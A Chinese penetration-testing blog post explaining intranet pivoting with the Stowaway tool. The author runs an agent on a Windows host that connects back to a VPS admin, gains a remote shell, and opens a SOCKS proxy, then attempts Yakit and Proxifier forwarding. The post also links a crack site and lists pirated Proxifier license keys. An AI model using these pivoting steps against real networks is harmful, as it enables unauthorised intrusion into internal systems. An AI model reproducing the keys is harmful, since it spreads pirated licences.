内网代理

SOCKS代理

什么是SOCKS代理

SOCKS代理是一种通过TCP或UDP协议在客户端与服务器之间建立连接的网络代理协议

Stowaway

项目地址:https://github.com/ph4ntonn/Stowaway/releases

image-20260322185325662

使用云服务器作为admin,自己的主机作为agent

将admin上传到自己的VPS上

image-20260322185337803

因为要权限 先执行加权限的命令

1
chmod +x ./linux_x64_admin

命令

1
./linux_x64_admin -l 2333

image-20260322185406421

在windows运行,注意的是要用windows_Powershell

image-20260322184918997

然后执行命令

1
./windows_x64_agent.exe -c [ip]:[监听端口]

image-20260322184916011

在VPS上出现(admin) >>就是连接成功了

image-20260322184913095

可以通过h或者help命令查看可用命令

image-20260322184909228

命令

detail

展示线节点的详细信息

image-20260322184904812

topo

展示在线节点的父子关系

image-20260322190036848

use

使用某个agent

image-20260322190126062

退出这个agent可以使用back命令

命令 作用
help 显示帮助信息和命令
detail 显示已连接的节点的信息
topo 显示线节点的父子关系
use 用来选择用户想要使用的目标节点
exit 用于退出程序

这里利用use 0选择连这个主机(detail展示的),然后可以用help查看可用命令,主要用到的是socks

image-20260322192739990

这里可以利用shell命令拿到主机权限,执行命令,这里执行了ipconfig

image-20260322191701526

但是发现是乱码,小问题执行一下转成UTF-8的命令就行

1
chcp 65001

image-20260322192126113

然后可以开一个socks进行流量转发

1
socks 15000

image-20260322193126476

看到successfully就是执行成功了,然后是想要在自己本机上执行命令打到内网有三种方式

使用Yakit

Yakit下载网址:https://yaklang.com/

先要配置Yakit

点击选择这个项目

image-20260322193758087

点击MITM

image-20260322193907970

然后进行配置

下游代理

1
2
socks5://<admin的IP>:<admin的端口>
socks5://ip:15000 #我自己的ip加上之前socks的端口

image-20260322194019325

然后点击劫持启动

然后点击这个免配置启动

image-20260322194409418

image-20260322194445210

但是这里出现了一点问题

image-20260322194816242

去网上重找了一共安装教程,发现要从插件开始搞,那就重试一次

image-20260322195220489

然后再来到这个MITM交互劫持功能,这个就和bp抓包类似,首先要下载安装证书

image-20260322195622939

噢~发现这个好像就是搞到浏览器里的类似于抓包插件一样,ok先暂时不搞因为这里是在云服务器上,暂时用不到

ok继续上面的劫持,发现好像是再配置的时候少勾选了,就把下面那些勾上试一下

image-20260322195844204

image-20260322200122684

还是有问题我要红温了

proxifier

安装破解:https://lilith.pro/gijyutsu/2725

这里放上标准版的key,主要是怕这篇博客被删

1
2
3
4
5
6
7
8
9
10
11
4MHDA-C3FNN-EV6YH-ZENEQ-5A2CP
YHAEF-HWLHS-CQR2A-ZENEQ-35H26
987NH-LYFSC-L4V37-PWN3R-PWE7F
CVYAW-WWVJD-8LA2Y-PWN3R-CZA82
TET7R-EY3CC-4E43T-H0NUS-XQCS9
G8E33-937CU-WM3YE-H0NUS-W236X
NRNQ9-KWN42-PSU2N-CYBER-HCEB7
GG2U7-5WH8W-TZF22-CYBER-BGTY3
S4EMQ-NYMZF-LFT3E-ARSEN-SNZLF
ATV34-T2W3Y-WHNWV-ARSEN-AJJ4L
5EZ8G-C3WL5-B56YG-SCXM9-6QZAP

从里面任选一个填在key那行,第一行name什么的随便填

然后装好了之后就要进行配置一下

打开配置文件的代理服务,这里要添加一个代理

image-20260322204133583

image-20260322204556254

image-20260322204718441

image-20260322204824087

渗透 > 知识点
#内网代理
内网代理
https://colourful228.github.io/2026/03/21/内网代理/
作者
Colourful
发布于
2026年3月21日
更新于
2026年3月22日
许可协议